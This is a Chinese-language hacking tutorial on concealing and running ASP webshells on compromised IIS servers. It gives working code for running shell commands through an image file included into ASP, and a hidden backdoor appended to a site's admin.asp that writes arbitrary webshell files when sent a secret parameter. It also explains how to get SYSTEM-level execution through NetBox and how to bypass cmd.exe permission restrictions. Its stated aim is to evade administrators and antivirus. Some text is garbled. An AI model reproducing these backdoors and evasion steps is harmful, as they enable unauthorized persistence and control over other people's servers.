[推荐]突破一般限制執行asp木馬
热 荐 ★★★★★
突破一般限制執行asp木馬
Script入侵中往往會上傳一個asp木馬來進一步擴大權限,或是在代理伺服器中留一個asp後門也是一個不錯的選擇。但是如何讓asp木馬更加隱匿和強大,從而躲過網管查殺逃過殺毒軟體追殺,並且具備system權限呢?改變程式碼變量也許是一個解決問題的辦法,但是我們不如換個角度思考,何不嘗試改變asp木馬的執行方式?
首先,我們可以換個任意後綴來執行asp木馬。換任意後綴來執行asp檔案方法有兩種,一種是include指令的使用。include指令可以讓我們直接呼叫位於其它檔案的函數,而不管後綴名是什麼。像我寫了一個簡單的asp木馬,功能是遍歷c:盤,源碼如下:
<%Set oScript = Server.CreateObject("WSCRIPT.SHELL") oScript.Run ("cmd.exe /c dir c:\ > c:\lcx.txt ") %>
我們可以將這段源碼儲存成1.jpg,然後將這句指令<!--#include file="1.jpg"-->放在2.asp檔案的檔案頭或檔案尾,那麼我們執行2.asp時,放在2.asp同目錄下的1.jpg同樣也會被呼叫,起到遍歷c:的功能即在c:下生成lcx.txt這一檔案。第二種方法是iis管理器中用asp.dll來解析任意後綴。在iis預設安裝情況下,我們可以查覺asa、cer、cdx後綴也可以成功執行asp絞畟臍伄q腦的控制臺-管理工具-Internet 服務管理器-web站臺-右鍵內容-主目錄-群組態-新增。
其次,我們可以讓asp木馬來觸發才執行。無論你的asp木馬寫得多麼好,基本總會呼叫到WSCRIPT.SHELL和Scripting.FileSystemObject這兩個對象。有經驗的網管可以執行尋找功能,讓你的木馬無處可逃。(這裡我也順便給大家提供一個啟明星工作室編寫的尋找asp木馬的工具,見附屬套用程式)我們能不能做到呼叫這兩個對象的asp木馬不放在代理伺服器上,需要時能夠隨時上傳執行呢?runasp.asp是一個用asp實現asp檔案的執行的Script,雖然還有很多bug,但是對我們呼叫執行asp木馬是足夠用了。更為可怕的是我在runasp.asp裡呼叫測試一些惡意程式碼時,居然躲過了瑞星的查殺。圖2。(由於runasp.asp程式碼太多,文章裡不方便列出,我已將其放在附屬套用程式裡了,大家可以自己研究一下)我們將runasp.asp放在代理伺服器上是不是一個很好的asp觸發器後門呢?另外,對付粗心的網管我們還可以將這樣一段程式碼放在asp檔案裡:
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你要插入的asp檔名?id=1">
<input type="text" size="20" name="Name"
value=<%=server.mappath("xp.asp")%>>
<textarea name="Message" class=input>
</textarea>
<input type="submit" name="Send" value="生成" class=input>
</form>
<% end if%>
像我放在動網文章的admin.asp的檔案尾端,當網管執行http://動網文章url/admin.asp時並沒有引起絲毫變化,而當我們執行http://動網文章url/admin.asp?id=1時,就可以根據我們的需要生成任意asp木馬檔案了。
最後,我們要讓asp木馬具備系統權限。我們的木馬眶o工具,除了Apache和微軟的IIS以外,目前是世界上第三個可以執行asp的套用伺服器,在Windows98/NT/2000/Me/XP下都可以直接執行,而且是一個大小只有為440kb的綠色檔案。我已將netbox群組態好了(請見附屬套用程式的netbox資料夾),大家使用的時候,只需將netbox資料夾放在某個盤符下,再在cmd下執行"x:\netbox\netbox.exe -install"即可安裝成功netbox,以後就可以執行http://ip:88/x.asp了。需要指出的是我在netbox的群組態檔裡main.box裡寫了這樣兩行程式碼:
If httpd.Create("", 88) = 0 Then
Set host = httpd.AddHost("", "\wwwroot")
意思是web的埠為88,asp檔案放在netbox目錄下的wwwroot資料夾。這個埠和資料夾,你都可以根據自己的需要用記事本開啟舊檔main.box來修改你所想要的。我們使用這一軟體最大的一個好處是我們的asp木馬在netbox環境下具備了系統權限,也許用它在代理伺服器上做主頁留後門也是一個不錯的選擇喲。
另外,因為我整篇文章寫得是如何突破一般限制來執行asp木馬,所以還有一點我要提及。在駭客防線2003年7期xhacker有篇文章《巧妙設定cmd權限加強主電腦安全群組態》提到過防止網上流行的cmd.asp木馬(見附屬套用程式)方法是可以用
cacls %systemroot/system32/cmd.exe /E /D IUSR_machine
cacls %systemroot/system32/dllcache/cmd.exe /E /D IUSR_machine
這樣兩條指令來限止cmd.exe的權限,於是cmd.asp木馬就失去作用了。針對這種限制我們也有辦法突破,我們可以將本機的cmd.exe改名傳到代理伺服器上,假設我們將cmd.exe改名為lcx.exe,傳在代理伺服器的d:\lcx目錄下,於是我們開啟舊檔cmd.asp, 找到
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)這一行源碼,改為
Call oScript.Run ("d:\lcx\lcx.exe /c " & szCMD & " > " & szTempFile, 0, True)即可,我們又可以成功執行cmd.asp了。
總之,如何能更好地執行asp木馬,發揮出它的強大功能,還是需要我們多動腦多動手,只有這樣我們才會有新的發現。
文章录入:cainiaowang 责任编辑:sygbox
您现在的位置: